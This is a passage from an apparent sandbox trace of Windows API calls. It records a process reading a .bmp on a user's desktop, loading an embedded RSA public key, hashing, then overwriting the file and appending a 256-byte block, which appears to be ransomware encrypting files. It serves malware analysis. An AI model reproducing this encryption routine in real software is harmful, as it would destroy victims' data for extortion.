ftLastAccessTime.dwHighDateTime=0x1d8a412, ftLastWriteTime.dwLowDateTime=0xf8da1cc0, ftLastWriteTime.dwHighDateTime=0x1d8a412, nFileSizeHigh=0x0, nFileSizeLow=0xd11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ov6fZG.bmp", cAlternateFileName="")) returned 1 [0192.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.353] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x345758 [0192.354] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.354] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\ov6fZG.bmp") returned=".bmp" [0192.354] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\ov6fZG.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\ov6fzg.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.354] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=3345) returned 1 [0192.354] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.358] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xceb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.358] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.361] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.361] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xd11, lpOverlapped=0x0) returned 1 [0192.361] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.361] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.362] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.362] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0192.362] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.362] CryptHashData (hHash=0x2a05e28, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.363] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.363] CryptGetHashParam (in: hHash=0x2a05e28, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.363] GetLastError () returned 0x0 [0192.363] CryptDestroyHash (hHash=0x2a05e28) returned 1 [0192.363] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0192.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.363] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.363] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.363] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd10) returned 0x2ae8ea0 [0192.363] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0192.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0192.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6140 [0192.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0192.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6158 [0192.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6188 [0192.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61e8 [0192.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61a0 [0192.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.364] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61e8 [0192.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0192.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61a0 [0192.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0192.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6188 [0192.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0192.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0192.366] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.367] GetCurrentThreadId () returned 0x5d8 [0192.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae72a8 [0192.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0192.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.368] GetCurrentThreadId () returned 0x5d8 [0192.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0192.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61e8 [0192.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6188 [0192.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0192.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61a0 [0192.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0192.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6170 [0192.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6200 [0192.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0192.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61d0 [0192.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae61b8 [0192.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6218 [0192.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61b8 [0192.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61d0 | out: hHeap=0x2c0000) returned 1 [0192.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0192.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0192.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6188 [0192.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0192.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61e8 | out: hHeap=0x2c0000) returned 1 [0192.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6218 | out: hHeap=0x2c0000) returned 1 [0192.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0192.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0192.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0192.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0192.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6200 | out: hHeap=0x2c0000) returned 1 [0192.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0192.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0192.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.381] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0192.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.383] WriteFile (in: hFile=0x584, lpBuffer=0x2ae8ea0*, nNumberOfBytesToWrite=0xd0c, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae8ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0xd0c, lpOverlapped=0x0) returned 1 [0192.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8ea0 | out: hHeap=0x2c0000) returned 1 [0192.383] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd11, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.383] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0192.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0192.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0192.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0192.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 